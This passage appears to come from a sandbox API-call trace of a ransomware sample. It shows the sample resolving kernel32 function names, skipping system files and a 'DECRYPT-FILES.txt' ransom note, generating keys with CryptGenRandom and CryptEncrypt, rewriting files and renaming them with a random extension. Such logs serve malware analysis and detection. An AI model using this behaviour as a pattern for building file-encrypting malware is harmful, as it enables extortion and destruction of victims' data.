lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.664] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.664] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.664] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.664] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.664] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.664] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.664] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.664] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.664] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.664] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.664] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.664] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.664] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.664] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.664] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.664] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.665] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.665] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.665] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.665] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.665] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.665] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.665] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.665] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.665] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.665] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.665] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.665] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.665] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.665] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.665] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.665] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.665] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.665] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.666] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.666] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.666] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.666] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.666] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.666] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.666] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.666] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.666] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.666] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.666] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.666] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.666] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.666] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.666] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.666] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.666] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.666] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.667] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.667] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.667] lstrlenA (lpString="DELETEATOM") returned 10 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.667] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.667] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.667] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.667] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.667] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.667] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.667] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.667] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.667] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.667] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.667] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.667] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.667] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.667] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.668] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.668] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.668] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.668] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.668] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.668] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.668] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.668] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.668] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.668] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.668] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.668] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.668] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.668] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.668] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.668] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.668] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.668] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.669] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.669] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.669] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.669] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.669] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.669] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.669] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.669] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.669] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a") returned 58 [0076.669] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a.i4N4j") returned 64 [0076.669] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6po6mqlu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a.i4N4j" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6po6mqlu.m4a.i4n4j"), dwFlags=0x0) returned 1 [0076.671] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.671] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.672] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.672] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cd1840, ftCreationTime.dwHighDateTime=0x1d4cc10, ftLastAccessTime.dwLowDateTime=0xbe83e370, ftLastAccessTime.dwHighDateTime=0x1d4cf1e, ftLastWriteTime.dwLowDateTime=0xbe83e370, ftLastWriteTime.dwHighDateTime=0x1d4cf1e, nFileSizeHigh=0x0, nFileSizeLow=0x14046, dwReserved0=0x0, dwReserved1=0x0, cFileName="7bIriEMdRI7QK.mp3", cAlternateFileName="7BIRIE~1.MP3")) returned 1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="DECRYPT-FILES.txt") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="autorun.inf") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="boot.ini") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="desktop.ini") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="ntuser.dat") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="iconcache.db") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="bootsect.bak") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="ntuser.dat.log") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="thumbs.db") returned -1 [0076.672] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3", lpString2="Bootfont.bin") returned -1 [0076.672] lstrlenW (lpString="7bIriEMdRI7QK.mp3") returned 17 [0076.672] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0076.672] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0076.672] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0076.672] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0076.672] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.672] lstrlenW (lpString="7bIriEMdRI7QK.mp3") returned 17 [0076.672] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.672] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="7bIriEMdRI7QK.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3" [0076.672] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7biriemdri7qk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.673] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=81990) returned 1 [0076.673] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.673] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.673] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.673] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.673] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.674] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.674] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.675] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.675] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.676] CloseHandle (hObject=0x444) returned 1 [0076.676] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.676] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, 